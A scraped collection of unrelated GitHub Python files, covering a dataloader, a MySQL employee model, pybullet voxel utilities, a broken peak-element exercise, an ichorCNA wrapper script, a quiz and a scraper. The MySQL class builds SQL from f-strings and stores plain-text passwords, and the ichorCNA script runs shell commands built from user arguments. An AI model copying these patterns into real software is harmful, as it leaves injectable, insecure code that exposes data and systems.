traj_1 = traj[2*sampled[0]:2*sampled[0]+traj_len*2]\n states1= torch.cat((traj_1[0::2].unsqueeze(-1),traj_1[1::2].unsqueeze(-1)),dim=-1)\n actions1 = self.actions[index,2*sampled[0]:2*sampled[0]+traj_len*2]\n actions1= torch.cat((actions1[0::2].unsqueeze(-1),actions1[1::2].unsqueeze(-1)),dim=-1)\n traj_1 = torch.cat((traj_1,temp),axis=0)\n\n traj_2 = traj[2*sampled[1]:2*sampled[1]+traj_len*2]\n states2= torch.cat((traj_2[0::2].unsqueeze(-1),traj_2[1::2].unsqueeze(-1)),dim=-1)\n actions2 = self.actions[index,2*sampled[1]:2*sampled[1]+traj_len*2]\n actions2= torch.cat((actions2[0::2].unsqueeze(-1),actions2[1::2].unsqueeze(-1)),dim=-1)\n traj_2 = torch.cat((traj_2,temp),axis=0)\n\n sampled_sa = torch.randperm(traj_len)[:self.state_samples]\n state_1 = states1[sampled_sa,:]\n action_1 = actions1[sampled_sa,:]\n\n state_2 = states2[sampled_sa,:]\n action_2 = actions2[sampled_sa,:]\n else:\n traj_1 = traj[4*sampled[0]:4*sampled[0]+traj_len*4]\n states1= torch.cat((traj_1[0::4].unsqueeze(-1),traj_1[1::4].unsqueeze(-1)),dim=-1)\n actions1= torch.cat((traj_1[2::4].unsqueeze(-1),traj_1[3::4].unsqueeze(-1)),dim=-1)\n \n traj_2 = traj[4*sampled[1]:4*sampled[1]+traj_len*4]\n states2= torch.cat((traj_2[0::4].unsqueeze(-1),traj_2[1::4].unsqueeze(-1)),dim=-1)\n actions2= torch.cat((traj_2[2::4].unsqueeze(-1),traj_2[3::4].unsqueeze(-1)),dim=-1)\n \n sampled_sa = torch.randperm(traj_len)[:self.state_samples]\n state_1 = states1[sampled_sa,:]\n action_1 = actions1[sampled_sa,:]\n\n state_2 = states2[sampled_sa,:]\n action_2 = actions2[sampled_sa,:]\n \n return traj_1,traj_2,state_1,action_1,state_2,action_2,traj_type,traj_len\n \n def __len__(self):\n return self.traj.size(0)\n\nif __name__ == '__main__':\n a = synthetic_example()\n b = a.__getitem__(0)\n print(b)","repo_name":"jeongeun980906/Representation_Learning_R3","sub_path":"utils/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2538470007","text":"import mysql.connector\n\nclass Modelo:\n def __init__(\n self,\n usuario,\n host,\n database,\n password=\"\"\n ):\n self.__user = usuario\n self.__host = host\n self.__password = password\n self.__database = database\n\n def __conexion(self):\n database = mysql.connector.connect(\n user = self.__user,\n host = self.__host,\n password = self.__password,\n database = self.__database\n )\n\n return database\n\n\n def obtener_usuarios(self):\n con = self.__conexion()\n cur = con.cursor()\n\n cur.execute(\"SELECT * FROM empleados\")\n result = cur.fetchall()\n con.close()\n return result\n\n def obtener_usuario(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n\n cur.execute(f\"SELECT * FROM empleados WHERE cedula = {cedula}\")\n result = cur.fetchone()\n con.close()\n return result\n\n\n \"\"\"\n cedula INT NOT NULL PRIMARY KEY,\n nombre VARCHAR(30) NOT NULL,\n apellido VARCHAR(30) NOT NULL,\n cargo_empleado INT NOT NULL DEFAULT 1,\n contrasenna VARCHAR(250) NOT NULL,\n CONSTRAINT fk_cargo FOREIGN KEY (cargo_empleado) REFERENCES cargos(id_tipo)\n \"\"\"\n\n def crear_usuario(\n self,\n cedula,\n nombre,\n apellido,\n contrasenna,\n cargo=1\n ):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"INSERT INTO empleados (cedula,nombre,apellido,contrasenna,cargo_empleado) VALUES ({cedula},'{nombre}','{apellido}','{contrasenna}',{cargo})\")\n con.commit()\n result = cur.rowcount\n con.close()\n return result\n\n\n def actualizar_usuario(\n self,\n cedula,\n nombre,\n apellido,\n contrasenna,\n cargo=1\n ):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"UPDATE empleados SET cedula={cedula},nombre='{nombre}',apellido='{apellido}',cargo_empleado={cargo},contrasenna='{contrasenna}'\")\n con.commit()\n result = cur.rowcount\n con.close()\n return result\n\n\n def eliminar_usuario(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"DELETE FROM empleados WHERE cedula = {cedula}\")\n con.commit()\n result = cur.rowcount\n con.close()\n return result\n\n\n def obtener_salario(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM nominas WHERE cedula = {cedula}\")\n result = cur.fetchall()\n con.close()\n return result\n\n def guardar_salario(self,cedula,salario):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"INSERT INTO nominas (cedula,salario) VALUES ({cedula},{salario})\")\n con.commit()\n result = cur.rowcount\n con.close()\n return result\n\n\n def actualizar_salario(self,cedula,salario):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"UPDATE nominas SET cedula={cedula},salario={salario} WHERE cedula = {cedula}\")\n con.commit()\n result = cur.rowcount\n con.close()\n return result\n\n\n def eliminar_salario(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"DELETE FROM nominas WHERE cedula={cedula}\")\n con.commit()\n result = cur.rowcount\n con.close()\n return result\n\n\n def get_cargos(self):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(\"SELECT * FROM cargos\")\n result = cur.fetchall()\n con.close()\n return result\n\n def set_porcentaje(self,porcentaje,id_cargo):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"INSERT INTO porcentajes (porcentaje,id_cargo) VALUES ({porcentaje},{id_cargo})\")\n con.commit()\n result = cur.rowcount\n con.close()\n return result\n\n\n def get_porcentajes(self):\n con = self.__conexion()\n cur = con.cursor()\n\n cur.execute(\"SELECT * FROM porcentajes\")\n result = cur.fetchall()\n con.close()\n return result\n\n\n def busqueda(self,search,param):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM empleados WHERE {param} LIKE '{search}%'\")\n result = cur.fetchall()\n con.close()\n return result\n\n\n def get_cargo(self,id):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM cargos WHERE id_tipo = {id}\")\n result = cur.fetchone()\n con.close()\n return result\n \n def set_sesion(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"INSERT INTO session (cedula,status) VALUES ({cedula},TRUE)\")\n con.commit()\n con.close()\n\n def get_sesion(self):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM session\")\n result = cur.fetchone()\n con.close()\n return result\n \n def remove_sesion(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"DELETE FROM session WHERE cedula = {cedula}\")\n con.commit()\n con.close()\n\n def get_bucetas(self):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM bucetas\")\n result = cur.fetchone()\n con.close()\n return result\n \n def get_horario(self,numero):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM control_bucetas WHERE numero = {numero}\")\n result = cur.fetchone()\n con.close()\n return result","repo_name":"Cristian-Barajas09/circunversa_project","sub_path":"model/modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42647136568","text":"import os\nimport pybullet as p\nimport numpy as np\nimport time\nfrom itertools import product\n\nfrom .utils import unit_pose, safe_zip, multiply, Pose, AABB, create_box, set_pose, get_all_links, LockRenderer, \\\n get_aabb, pairwise_link_collision, remove_body, draw_aabb, get_box_geometry, create_shape, create_body, STATIC_MASS, \\\n unit_quat, unit_point, CLIENT, create_shape_array, set_color, get_point, clip, load_model, TEMP_DIR, NULL_ID, \\\n elapsed_time, draw_point, invert, tform_point, draw_pose, get_aabb_edges, add_line, \\\n get_pose, PoseSaver, get_aabb_vertices, aabb_from_points, apply_affine, OOBB, draw_oobb, get_aabb_center\n\nMAX_TEXTURE_WIDTH = 418 # max square dimension\nMAX_PIXEL_VALUE = 2**8 - 1\nMAX_LINKS = 125 # Max links seems to be 126\n\n################################################################################\n\n# TODO: different extensions\n\nclass VoxelGrid(object):\n # https://github.mit.edu/caelan/ROS/blob/master/sparse_voxel_grid.py\n # https://github.mit.edu/caelan/ROS/blob/master/base_navigation.py\n # https://github.mit.edu/caelan/ROS/blob/master/utils.py\n # https://github.mit.edu/caelan/ROS/blob/master/voxel_detection.py\n # TODO: can always display the grid in RVIZ after filtering\n # TODO: compute the maximum sized cuboid (rectangle) in a grid (matrix)\n\n def __init__(self, resolutions, default=bool, world_from_grid=unit_pose(), aabb=None, color=(1, 0, 0, 0.5),):\n #def __init__(self, sizes, centers, pose=unit_pose()):\n # TODO: defaultdict\n #assert len(sizes) == len(centers)\n assert callable(default)\n self.resolutions = resolutions\n self.default = default\n self.value_from_voxel = {}\n self.world_from_grid = world_from_grid\n self.aabb = aabb # TODO: apply\n self.color = color\n #self.bodies = None\n # TODO: store voxels more intelligently spatially\n @property\n def occupied(self): # TODO: get_occupied\n return sorted(self.value_from_voxel)\n def __iter__(self):\n return iter(self.value_from_voxel)\n def __len__(self):\n return len(self.value_from_voxel)\n def copy(self): # TODO: deepcopy\n new_grid = VoxelGrid(self.resolutions, self.default, self.world_from_grid, self.aabb, self.color)\n new_grid.value_from_voxel = dict(self.value_from_voxel)\n return new_grid\n\n def to_grid(self, point_world):\n return tform_point(invert(self.world_from_grid), point_world)\n def to_world(self, point_grid):\n return tform_point(self.world_from_grid, point_grid)\n\n def voxel_from_point(self, point):\n point_grid = self.to_grid(point)\n return tuple(np.floor(np.divide(point_grid, self.resolutions)).astype(int))\n #def voxels_from_aabb_grid(self, aabb):\n # voxel_lower, voxel_upper = map(self.voxel_from_point, aabb)\n # return map(tuple, product(*[range(l, u + 1) for l, u in safe_zip(voxel_lower, voxel_upper)]))\n def voxels_from_aabb(self, aabb):\n voxel_lower, voxel_upper = aabb_from_points([\n self.voxel_from_point(point) for point in get_aabb_vertices(aabb)])\n return map(tuple, product(*[range(l, u + 1) for l, u in safe_zip(voxel_lower, voxel_upper)]))\n\n # Grid coordinate frame\n def lower_from_voxel(self, voxel):\n return np.multiply(voxel, self.resolutions) # self.to_world(\n def center_from_voxel(self, voxel):\n return self.lower_from_voxel(np.array(voxel) + 0.5)\n def upper_from_voxel(self, voxel):\n return self.lower_from_voxel(np.array(voxel) + 1.0)\n def aabb_from_voxel(self, voxel):\n return AABB(self.lower_from_voxel(voxel), self.upper_from_voxel(voxel))\n\n def ray_trace(self, start_cell, goal_point):\n # TODO: finish adapting\n if self.is_occupied(start_cell):\n return [], False\n goal_cell = self.get_index(goal_point)\n start_point = self.get_center(start_cell)\n unit = goal_point - start_point\n unit /= np.linalg.norm(unit)\n direction = (unit / np.abs(unit)).astype(int)\n\n path = []\n current_point = start_point\n current_cell = start_cell\n while current_cell != goal_cell:\n path.append(current_cell)\n min_k, min_t = None, float('inf')\n for k, sign in enumerate(direction):\n next_point = self.get_min(current_cell) if sign < 0 else self.get_max(current_cell)\n t = ((next_point - current_point)/direction)[k]\n assert(t > 0)\n if (t != 0) and (t < min_t):\n min_k, min_t = k, t\n assert(min_k is not None)\n current_point += min_t*unit\n current_cell = np.array(current_cell, dtype=int)\n current_cell[min_k] += direction[min_k]\n current_cell = tuple(current_cell)\n if self.is_occupied(current_cell):\n return path, False\n return path, True\n\n # World coordinate frame\n def pose_from_voxel(self, voxel):\n pose_grid = Pose(self.center_from_voxel(voxel))\n return multiply(self.world_from_grid, pose_grid)\n def vertices_from_voxel(self, voxel):\n return list(map(self.to_world, get_aabb_vertices(self.aabb_from_voxel(voxel))))\n\n def contains(self, voxel): # TODO: operator versions\n return voxel in self.value_from_voxel\n def get_value(self, voxel):\n assert self.contains(voxel)\n return self.value_from_voxel[voxel]\n def set_value(self, voxel, value):\n # TODO: remove if value == default\n self.value_from_voxel[voxel] = value\n def remove_value(self, voxel):\n if self.contains(voxel):\n self.value_from_voxel.pop(voxel) # TODO: return instead?\n\n is_occupied = contains\n def set_occupied(self, voxel):\n if self.is_occupied(voxel):\n return False\n self.set_value(voxel, value=self.default())\n return True\n def set_free(self, voxel):\n if not self.is_occupied(voxel):\n return False\n self.remove_value(voxel)\n return True\n\n def get_neighbors(self, index):\n for i in range(len(index)):\n direction = np.zeros(len(index), dtype=int)\n for n in (-1, +1):\n direction[i] = n\n yield tuple(np.array(index) + direction)\n def get_clusters(self, voxels=None):\n if voxels is None:\n voxels = self.occupied\n clusters = []\n assigned = set()\n def dfs(current):\n if (current in assigned) or (not self.is_occupied(current)):\n return []\n cluster = [current]\n assigned.add(current)\n for neighbor in self.get_neighbors(current):\n cluster.extend(dfs(neighbor))\n return cluster\n\n for voxel in voxels:\n cluster = dfs(voxel)\n if cluster:\n clusters.append(cluster)\n return clusters\n\n # TODO: implicitly check collisions\n def create_box(self):\n color = (0, 0, 0, 0)\n #color = None\n box = create_box(*self.resolutions, color=color)\n #set_color(box, color=color)\n set_pose(box, self.world_from_grid) # Set to (0, 0, 0) instead?\n return box\n def get_affected(self, bodies, occupied):\n #assert self.world_from_grid == unit_pose()\n check_voxels = {}\n for body in bodies:\n # TODO: compute AABB in grid frame\n # pose_world = get_pose(body)\n # pose_grid = multiply(invert(self.world_from_grid), pose_world)\n # with PoseSaver(body):\n # set_pose(body, pose_grid)\n for link in get_all_links(body):\n aabb = get_aabb(body, link) # TODO: pad using threshold\n for voxel in self.voxels_from_aabb(aabb):\n if self.is_occupied(voxel) == occupied:\n check_voxels.setdefault(voxel, []).append((body, link))\n return check_voxels\n def check_collision(self, box, voxel, pairs, threshold=0.):\n box_pairs = [(box, link) for link in get_all_links(box)]\n set_pose(box, self.pose_from_voxel(voxel))\n return any(pairwise_link_collision(body1, link1, body2, link2, max_distance=threshold)\n for (body1, link1), (body2, link2) in product(pairs, box_pairs))\n\n def add_point(self, point):\n self.set_occupied(self.voxel_from_point(point))\n def add_aabb(self, aabb):\n for voxel in self.voxels_from_aabb(aabb):\n self.set_occupied(voxel)\n def add_body(self, body, **kwargs):\n self.add_bodies([body], **kwargs)\n def add_bodies(self, bodies, threshold=0.):\n # Otherwise, need to transform bodies\n check_voxels = self.get_affected(bodies, occupied=False)\n box = self.create_box()\n for voxel, pairs in check_voxels.items(): # pairs typically only has one element\n if self.check_collision(box, voxel, pairs, threshold=threshold):\n self.set_occupied(voxel)\n remove_body(box)\n def remove_body(self, body, **kwargs):\n self.remove_bodies([body], **kwargs)\n def remove_bodies(self, bodies, **kwargs):\n # TODO: could also just iterate over the voxels directly\n check_voxels = self.get_affected(bodies, occupied=True)\n box = self.create_box()\n for voxel, pairs in check_voxels.items():\n if self.check_collision(box, voxel, pairs, **kwargs):\n self.set_free(voxel)\n remove_body(box)\n\n def draw_origin(self, scale=1, **kwargs):\n size = scale*np.min(self.resolutions)\n return draw_pose(self.world_from_grid, length=size, **kwargs)\n def draw_voxel(self, voxel, color=None):\n if color is None:\n color = self.color\n aabb = self.aabb_from_voxel(voxel)\n return draw_oobb(OOBB(aabb, self.world_from_grid), color=color[:3])\n # handles.extend(draw_aabb(aabb, color=self.color[:3]))\n def draw_voxel_boxes(self, voxels=None, **kwargs):\n if voxels is None:\n voxels = self.occupied\n with LockRenderer():\n handles = []\n for voxel in voxels:\n handles.extend(self.draw_voxel(voxel, **kwargs))\n return handles\n def draw_voxel_centers(self, voxels=None, color=None):\n # TODO: could align with grid orientation\n if voxels is None:\n voxels = self.occupied\n if color is None:\n color = self.color\n with LockRenderer():\n size = np.min(self.resolutions) / 2\n handles = []\n for voxel in voxels:\n point_world = self.to_world(self.center_from_voxel(voxel))\n handles.extend(draw_point(point_world, size=size, color=color[:3]))\n return handles\n\n def create_voxel_bodies1(self):\n start_time = time.time()\n geometry = get_box_geometry(*self.resolutions)\n collision_id, visual_id = create_shape(geometry, color=self.color)\n bodies = []\n for voxel in self.occupied:\n body = create_body(collision_id, visual_id)\n #scale = self.resolutions[0]\n #body = load_model('models/voxel.urdf', fixed_base=True, scale=scale)\n set_pose(body, self.pose_from_voxel(voxel))\n bodies.append(body) # 0.0462474774444 / voxel\n print(elapsed_time(start_time))\n return bodies\n def create_voxel_bodies2(self):\n geometry = get_box_geometry(*self.resolutions)\n collision_id, visual_id = create_shape(geometry, color=self.color)\n ordered_voxels = self.occupied\n bodies = []\n for start in range(0, len(ordered_voxels), MAX_LINKS):\n voxels = ordered_voxels[start:start + MAX_LINKS]\n body = p.createMultiBody(#baseMass=STATIC_MASS,\n #baseCollisionShapeIndex=-1,\n #baseVisualShapeIndex=-1,\n #basePosition=unit_point(),\n #baseOrientation=unit_quat(),\n #baseInertialFramePosition=unit_point(),\n #baseInertialFrameOrientation=unit_quat(),\n linkMasses=len(voxels)*[STATIC_MASS],\n linkCollisionShapeIndices=len(voxels)*[collision_id],\n linkVisualShapeIndices=len(voxels)*[visual_id],\n linkPositions=list(map(self.center_from_voxel, voxels)),\n linkOrientations=len(voxels)*[unit_quat()],\n linkInertialFramePositions=len(voxels)*[unit_point()],\n linkInertialFrameOrientations=len(voxels)*[unit_quat()],\n linkParentIndices=len(voxels)*[0],\n linkJointTypes=len(voxels)*[p.JOINT_FIXED],\n linkJointAxis=len(voxels)*[unit_point()],\n physicsClientId=CLIENT)\n set_pose(body, self.world_from_grid)\n bodies.append(body) # 0.0163199263677 / voxel\n return bodies\n def create_voxel_bodies3(self):\n ordered_voxels = self.occupied\n geoms = [get_box_geometry(*self.resolutions) for _ in ordered_voxels]\n poses = list(map(self.pose_from_voxel, ordered_voxels))\n #colors = [list(self.color) for _ in self.voxels] # TODO: colors don't work\n colors = None\n collision_id, visual_id = create_shape_array(geoms, poses, colors)\n body = create_body(collision_id, visual_id) # Max seems to be 16\n #dump_body(body)\n set_color(body, self.color)\n return [body]\n def create_voxel_bodies(self):\n with LockRenderer():\n return self.create_voxel_bodies1()\n #return self.create_voxel_bodies2()\n #return self.create_voxel_bodies3()\n\n def create_intervals(self):\n voxel_heights = {}\n for i, j, k in self.occupied:\n voxel_heights.setdefault((i, j), set()).add(k)\n voxel_intervals = []\n for i, j in voxel_heights:\n heights = sorted(voxel_heights[i, j])\n start = last = heights[0]\n for k in heights[1:]:\n if k == last + 1:\n last = k\n else:\n interval = (start, last)\n voxel_intervals.append((i, j, interval))\n start = last = k\n interval = (start, last)\n voxel_intervals.append((i, j, interval))\n return voxel_intervals\n def draw_intervals(self):\n with LockRenderer():\n handles = []\n for (i, j, (k1, k2)) in self.create_intervals():\n voxels = [(i, j, k1), (i, j, k2)]\n aabb = aabb_from_points([extrema for voxel in voxels for extrema in self.aabb_from_voxel(voxel)])\n handles.extend(draw_oobb(OOBB(aabb, self.world_from_grid), color=self.color[:3]))\n return handles\n def draw_vertical_lines(self):\n with LockRenderer():\n handles = []\n for (i, j, (k1, k2)) in self.create_intervals():\n voxels = [(i, j, k1), (i, j, k2)]\n aabb = aabb_from_points([extrema for voxel in voxels for extrema in self.aabb_from_voxel(voxel)])\n center = get_aabb_center(aabb)\n p1 = self.to_world(np.append(center[:2], [aabb[0][2]]))\n p2 = self.to_world(np.append(center[:2], [aabb[1][2]]))\n handles.append(add_line(p1, p2, color=self.color[:3]))\n return handles\n\n def project2d(self):\n # TODO: combine adjacent voxels into larger lines\n # TODO: greedy algorithm that combines lines/boxes\n # TODO: combine intervals\n tallest_voxel = {}\n for i, j, k in self.occupied:\n tallest_voxel[i, j] = max(k, tallest_voxel.get((i, j), k))\n return {(i, j, k) for (i, j), k in tallest_voxel.items()}\n def create_height_map(self, plane, plane_size, width=MAX_TEXTURE_WIDTH, height=MAX_TEXTURE_WIDTH):\n min_z, max_z = 0., 2.\n plane_extent = plane_size*np.array([1, 1, 0])\n plane_lower = get_point(plane) - plane_extent/2.\n #plane_aabb = (plane_lower, plane_lower + plane_extent)\n #plane_aabb = get_aabb(plane) # TODO: bounding box is effectively empty\n #plane_lower, plane_upper = plane_aabb\n #plane_extent = (plane_upper - plane_lower)\n image_size = np.array([width, height])\n # TODO: fix width/height order\n pixel_from_point = lambda point: np.floor(\n image_size * (point - plane_lower)[:2] / plane_extent[:2]).astype(int)\n\n # TODO: last row/col doesn't seem to be filled\n height_map = np.zeros(image_size)\n for voxel in self.project2d():\n voxel_aabb = self.aabb_from_voxel(voxel)\n #if not aabb_contains_aabb(aabb2d_from_aabb(voxel_aabb), aabb2d_from_aabb(plane_aabb)):\n # continue\n (x1, y1), (x2, y2) = map(pixel_from_point, voxel_aabb)\n if (x1 < 0) or (width <= x2) or (y1 < 0) or (height <= y2):\n continue\n scaled_z = (clip(voxel_aabb[1][2], min_z, max_z) - min_z) / max_z\n for c in range(x1, x2+1):\n for y in range(y1, y2+1):\n r = height - y - 1 # TODO: can also just set in bulk if using height_map\n height_map[r, c] = max(height_map[r, c], scaled_z)\n return height_map\n\n################################################################################\n\ndef create_textured_square(size, color=None,\n width=MAX_TEXTURE_WIDTH, height=MAX_TEXTURE_WIDTH):\n body = load_model('models/square.urdf', scale=size)\n if color is not None:\n set_color(body, color)\n path = os.path.join(TEMP_DIR, 'texture.png')\n image = MAX_PIXEL_VALUE*np.ones((width, height, 3), dtype=np.uint8)\n import scipy.misc\n scipy.misc.imsave(path, image)\n texture = p.loadTexture(path)\n p.changeVisualShape(body, NULL_ID, textureUniqueId=texture, physicsClientId=CLIENT)\n return body, texture\n\n\ndef set_texture(texture, image):\n # Alias/WaveFront Material (.mtl) File Format\n # https://people.cs.clemson.edu/~dhouse/courses/405/docs/brief-mtl-file-format.html\n #print(get_visual_data(body))\n width, height, channels = image.shape\n pixels = image.flatten().tolist()\n assert len(pixels) <= 524288\n # b3Printf: uploadBulletFileToSharedMemory 747003 exceeds max size 524288\n p.changeTexture(texture, pixels, width, height, physicsClientId=CLIENT)\n # TODO: it's important that width and height are the same as the original\n\n\ndef rgb_interpolate(grey_image, min_color, max_color):\n width, height = grey_image.shape\n channels = 3\n rgb_image = np.zeros((width, height, channels), dtype=np.uint8)\n for k in range(channels):\n rgb_image[..., k] = MAX_PIXEL_VALUE*(min_color[k]*(1-grey_image) + max_color[k]*grey_image)\n return rgb_image","repo_name":"caelan/pybullet-planning","sub_path":"pybullet_tools/voxels.py","file_name":"voxels.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"21"} +{"seq_id":"35675144036","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 22 21:13:58 2018\r\n\r\n@author: Atul Anand\r\n\"\"\"\r\n\r\n\r\n\r\ndef findPeakElementBest(list1,low,high):#NOT WORKING\r\n mid = (low + high ) //2 #low + ( (high - low) //2)\r\n n = len(list1)\r\n if ( (( mid ==0) or (list1[mid-1] <= list1[mid] ) ) and (( mid == n-1) or (list1[mid+1] <= list1[mid] ))):\r\n return mid\r\n \r\n elif ( mid > 0 and ( list1[mid-1] > list1[mid]) ):\r\n return findPeakElementBest(list1,low,mid-1)\r\n \r\n else:\r\n return findPeakElementBest(list1,mid+1,high)\r\n \r\n \r\n \r\n \r\n\r\n\r\nlist1=[10,20,15,2,23,90,67]\r\n\r\nprint(findPeakElementBest(list1,0,len(list1)))\r\n\r\n\r\n\r\n\r\ndef findPeakElement(list1):\r\n left=list1[0]\r\n right= list1[2]\r\n peakElemList =[]\r\n for i in range(1,len(list1)):\r\n if left < list1[i] and list1[i] >right:\r\n peakElemList.append(list1[i])\r\n left = list1[i]\r\n try:\r\n right = list1[i+2]\r\n except:\r\n continue\r\n return max(peakElemList)\r\n\r\n\r\nlist1=[10,20,15,2,23,90,67]\r\n\r\nprint(findPeakElement(list1))\r\n ","repo_name":"atulanandnitt/questionsBank","sub_path":"basicDataStructure/array_list/extra/findPeakElement.py","file_name":"findPeakElement.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4655360614","text":"#Email:fanyucai1@126.com\n#2019.3.23\n\nimport os\nimport argparse\nimport subprocess\nR=\"/software/R/R-v3.5.2/bin/\"\nHMMcopy=\"/software/hmmcopy_utils/hmmcopy_utils-master/bin/\"\nichorCNA=\"/software/ichorCNA/ichorCNA-master\"\n\nparser=argparse.ArgumentParser(\"Use ichorCNA to evaluate the prognostic role of cfDNA tumor fraction\")\nparser.add_argument(\"--bam\",help=\"bam files\",required=True)\nparser.add_argument(\"--bin\",help=\"bin size(kb)\",required=True,choices=[10,50,500,1000])\nparser.add_argument(\"--prefix\",help=\"prefix of output\",required=True)\nparser.add_argument(\"--outdir\",help=\"output diretory\",required=True)\nargs=parser.parse_args()\nbin=args.bin*1000\nif not os.path.exists(args.outdir):\n os.mkdir(args.outdir)\nout=args.outdir\nout+=args.prefix\nargs.bam=os.path.abspath(args.bam)\n######################Generate Read Count File\ncmd=\"%s/readCounter --window %s --quality 20 --chromosome \\\"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,X,Y\\\" %s >%s.wig\" \\\n %(HMMcopy,bin,args.bam,out)\nsubprocess.check_call(cmd,shell=True)\n#######################run ichorCNA\npar=\"--gcWig %s/inst/extdata/gc_hg19_%skb.wig \" %(ichorCNA,args.bin)\npar+=\"--mapWig %s/inst/extdata/map_hg19_%skb.wig \" %(ichorCNA,args.bin)\npar+=\"--centromere %s/inst/extdata/GRCh37.p13_centromere_UCSC-gapTable.txt \"%(ichorCNA)\n####################Low tumor content samples (early stage disease)https://github.com/broadinstitute/ichorCNA/wiki/Parameter-tuning-and-settings#low-tumor-content-samples-early-stage-disease\npar+=\"--ploidy \\\"c(2)\\\" \"\npar+=\"--normal \\\"c(0.95, 0.99, 0.995, 0.999)\\\" \"\npar+=\"--chrs \\\"c(1:22)\\\" --chrTrain \\\"c(1:22)\\\" \"\npar+=\"--estimateScPrevalence FALSE --scStates \\\"c()\\\" \"\npar+=\"--maxCN 4 \"\nif args.bin==1000:\n par+=\"--normalPanel %s/inst/extdata/HD_ULP_PoN_1Mb_median_normAutosome_mapScoreFiltered_median.rds\"\nif args.bin==500:\n par+=\"--normalPanel %s/inst/extdata/HD_ULP_PoN_500kb_median_normAutosome_mapScoreFiltered_median.rds\"\ncmd=\"%s/Rscript %s/scripts/runIchorCNA.R --id %s --WIG %s.wig %s --outDir %s\" \\\n %(R,ichorCNA,args.prefix,out,par,args.outdir)\nsubprocess.check_call(cmd,shell=True)","repo_name":"fanyucai1/script","sub_path":"ichorCNA.py","file_name":"ichorCNA.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72577554987","text":"'''----------RETO EXAMEN-----\nRealiza un examen con 3 preguntas que\ntu desees, el usuario debera responder\nSI o NO y al final otorgarle una calif\n(la calif se logra con una variable\nque inicia en 0 y por cada respuesta se\nincrementa en 1 en 1)\n\n'''\n#la calificacion inicial es 0\ncalificación = 0\n\n\n'''\n\npregunta_1 = input('¿El inicial evoluciona en el nivel 17? : \\r\\n')\nif pregunta_1 == 'SI':\n print('Incorrecto. Evolucionan en nivel 16')\n \n \nelif pregunta_1 == 'NO':\n print('Correcto')\n calificación =+ 1\n\nprint(f'LLevas {calificación} de 3')\n\npregunta_2 = input('¿El usuario puede llevar 7 Pokemon en tu equipo a la ves? \\r\\n')\n\nif pregunta_2 == 'SI':\n print('Incorrecto. Evolucionan en nivel 16')\n \nelif pregunta_2 == 'NO':\n print('Correcto')\n calificación =+ 1\n\nprint(f'LLevas {calificación} de 3') \n\npregunta_3 = input('¿El alto mando son 4 entradores y el campeón? \\r\\n')\n\nif pregunta_3 == 'NO':\n print('Incorrecto. Si son 4 entrenadores y el campeon')\n \nelif pregunta_3 == 'SI':\n print('Correcto')\n calificación +=1\n print(f'LLevas {calificación} de 3')\n\nprint(f'Tu calificacion final fue {calificación} de 3')\n\n'''\ncalificación= 0\n\npreguntas = {'¿El inicial evoluciona en el nivel 17? :': 'no',\n '¿El usuario puede llevar 7 Pokemon en tu equipo a la ves?' : 'no' ,\n '¿El alto mando son 4 entradores y el campeón?': 'si'}\n\nfor pregunta in preguntas:\n question = input(pregunta)\n if question == preguntas.get(pregunta):\n calificación +=1\n\nprint(f'Tu calificacion es {calificación} de 3')\n","repo_name":"macRountree/Desarrolloweb","sub_path":"Python/14 inputRetoexamen.py","file_name":"14 inputRetoexamen.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38650698233","text":"import scrapy\n\n# scrapy runspider scrapping_category_types.py -o categories_by_type_from_top_100_recipes.json\n\ndef clean_string(x):\n x = x.strip().replace(\" \",\"-\").replace(\"/\",\"-\").replace(\"&\",\"and\").replace(\"'\",\"\")\n x = x.replace(\"é\",\"e\").replace(\"ñ\",\"n\").lower()\n # tem uma categoria do tipo type que está com a url no singular\n x = x.replace(\"cookies\",\"cookie\")\n return x\n \nclass CategoriesSpider(scrapy.Spider):\n name = \"categoriesspider\"\n categories = []\n with open(\"categories_from_top_100_recipes.txt\", \"r\") as file:\n categories_raw = file.readlines()\n \n categories = [clean_string(cat) for cat in categories_raw]\n \n ingredients = [\"https://www.epicurious.com/ingredients/\"+ cat.lower() for cat in categories]\n source = [\"https://www.epicurious.com/source/\"+ cat.lower() for cat in categories]\n special_considerations = [\"https://www.epicurious.com/special-consideration/\"+ cat.lower() for cat in categories]\n type_urls = [\"https://www.epicurious.com/type/\"+ cat.lower() for cat in categories]\n tag = [\"https://www.epicurious.com/tag/\"+ cat.lower() for cat in 